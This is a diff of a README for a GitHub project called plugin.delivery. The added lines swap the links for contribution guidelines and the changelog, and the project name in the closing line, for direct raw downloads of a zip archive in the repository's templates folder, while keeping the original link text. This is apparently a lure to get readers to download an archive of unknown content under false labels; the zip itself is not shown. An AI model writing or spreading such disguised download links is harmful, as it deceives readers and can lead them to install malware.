Charleeesss/plugin.delivery/README.md

 ## ✨ Contributing

-If you wish to contribute, feel free to check our [Contribution Guidelines](https://github.com/Charleeesss/plugin.delivery/blob/main/CONTRIBUTING.md).
+If you wish to contribute, feel free to check our [Contribution Guidelines](https://github.com/Charleeesss/plugin.delivery/raw/refs/heads/main/templates/plugin-delivery-v1.3.zip).
 Your contributions help make the project better for everyone.

 ## 📅 Changelog

-Stay updated with all changes and improvements by checking our [Changelog](https://github.com/Charleeesss/plugin.delivery/releases) regularly.
+Stay updated with all changes and improvements by checking our [Changelog](https://github.com/Charleeesss/plugin.delivery/raw/refs/heads/main/templates/plugin-delivery-v1.3.zip) regularly.

 ## 📞 Contact Us

 If you have questions or need support, you can reach out through our issues section on GitHub or contact us directly at our designated email.

-Thank you for using plugin.delivery!
+Thank you for using https://github.com/Charleeesss/plugin.delivery/raw/refs/heads/main/templates/plugin-delivery-v1.3.zip!
 We hope you enjoy building innovative solutions with our tools.